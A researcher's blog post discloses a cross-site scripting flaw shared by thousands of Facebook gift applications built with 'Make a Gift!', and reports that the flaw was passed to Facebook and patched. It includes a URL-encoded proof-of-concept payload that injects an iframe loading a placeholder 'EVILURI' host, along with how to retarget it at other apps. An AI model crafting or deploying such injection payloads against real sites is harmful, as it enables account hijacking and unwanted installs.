(This makes up for Monday’s FAXX Hack absence.)
Several Facebook applications serve to create other Facebook applications. For example, “Make a Gift!” lets users create applications for sending themed virtual gifts to friends. The user specifies various custom parameters for their new application, but the actual code is hosted by the original application.
This means, though, that a vulnerability in the codebase applies to every application built on it. Case in point: Earlier this week, I discovered an XSS hole in Make a Gift! applications. As an example, this URI demonstrates the hole for the Friends! gift application:http://apps.facebook.com/friendsbghdkbhfbpgkg/?target=calendar-w&month=10&year=2009)%22%3E%3C%2Fa%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Fgifts.applatform.com%2Fa%2F1673%2F%3Fajax%3D1%26target%3Dcalendar-w%26month%3D10%26year%3D2009)%2522%253E%253C%252Fa%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E%22%3E
To launch an attack against another gift application, one only need change the canvas URI and the 4-digit number in the gifts.applatform.com URI. The largest applications I know of built with Make a Gift! are Friends! (2,135,691 monthly active users) and Birthday (2,993,635 monthly active users). From browsing the Make a Gift! application, I counted at least 9,689 applications built using it, and the above vulnerability applied to every one of them. The hole was also capable of a clickjacking install.
I did not have a direct contact for the developer of the Make a Gift! application, but I notified Facebook and they passed on word. Fortunately, the codebase was patched fairly quickly.